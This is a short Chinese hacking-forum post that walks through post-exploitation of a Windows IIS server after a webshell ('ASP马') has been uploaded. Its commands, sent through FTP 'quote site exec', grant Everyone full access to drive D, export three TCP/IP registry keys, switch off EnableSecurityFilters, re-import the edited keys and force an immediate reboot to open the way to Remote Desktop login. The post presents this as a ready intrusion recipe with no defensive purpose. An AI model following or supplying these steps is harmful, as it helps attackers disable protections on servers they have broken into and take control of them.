类似贴：
Quote:
从上传webshell到突破TCP/IP筛选到3389终端登陆http://www.hxhack.com/bbs/read.php?tid-75949-keyword-IP%C9%B8%D1%A1.html
quotesiteexec"cacls.exed:/e/t/geveryone:F"#把d盘设置为everyone可以浏览这样一会导出文件放D盘就可以下载了...
quotesiteexec"regedit-eD:\1.regHKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip"#导出注册表里关于TCP/IP筛选的第一处（-eD:\1.reg导出后放在D盘下，文件1.reg）
quotesiteexec"regedit-eD:\2.reg
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip"#导出注册表里关于TCP/IP筛选的第二处
quotesiteexec"regedit-eD:\3.reg
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip"#导出注册表里关于TCP/IP筛选的第三处
全部导出了，然后回ASP马，把三个下下来...
编辑一下，把关于TCP/IP筛选的几个地方改一下，首先打开1.reg找到"EnableSecurityFilters"=dword:00000001把最后面的数字1改成0后保存，然后更改2.reg,3.reg，更改方法一样.改好后保存...然后上传，覆盖...OK.....
在回来FTP命令下....
quotesiteexec"regedit-sD:\1.reg"
quotesiteexec"regedit-sD:\2.reg"
quotesiteexec"regedit-sD:\3.reg"
OK.........
导入后要从起，，，那我们让他从起吧...
quotesiteexec"iisreset/reboot/timeout:00"#利用他自身的iis服务来重新启动他的机器，/timeout:00这个参数是让他立即重新启动..